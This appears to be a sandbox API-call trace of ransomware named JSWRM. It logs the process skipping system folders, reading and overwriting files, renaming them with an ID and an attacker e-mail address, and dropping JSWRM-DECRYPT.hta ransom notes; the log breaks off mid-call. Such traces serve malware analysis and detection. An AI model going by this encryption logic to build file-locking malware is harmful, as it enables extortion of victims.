lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.712] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0059.712] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.713] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=79634) returned 1 [0059.713] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13710) returned 0x2471a8 [0059.713] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13710, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13710, lpOverlapped=0x0) returned 1 [0059.720] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.720] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13710, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13710, lpOverlapped=0x0) returned 1 [0059.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.721] CloseHandle (hObject=0x3d4) returned 1 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0059.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0059.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0059.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.723] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.724] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.724] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0059.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0059.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.724] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.724] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0059.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0059.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.725] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1044", cAlternateFileName="")) returned 1 [0059.725] lstrcmpiW (lpString1="1044", lpString2=".") returned 1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="..") returned 1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="...") returned 1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="windows") returned -1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="recovery") returned -1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="perflogs") returned -1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="documents and settings") returned -1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="$RECYCLE.BIN") returned 1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="system volume information") returned -1 [0059.725] lstrcmpiW (lpString1="1044", lpString2="msocache") returned -1 [0059.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0059.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.725] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1044\\jswrm-decrypt.hta")) returned 0xffffffff [0059.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0059.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0059.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0059.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0059.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1044\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.731] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.732] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.732] CloseHandle (hObject=0x450) returned 1 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.733] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1044\\jswrm-decrypt.hta")) returned 0x20 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.733] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a42cf1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0059.733] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.733] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a42cf1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.733] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.733] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.733] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.733] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.733] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.733] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.734] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.734] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.734] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3046) returned 1 [0059.735] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe0) returned 0x23dc88 [0059.735] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xbe0, lpOverlapped=0x0) returned 1 [0059.736] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.736] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xbe0, lpOverlapped=0x0) returned 1 [0059.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.737] CloseHandle (hObject=0x3d4) returned 1 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0059.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.737] HeapFree (in: 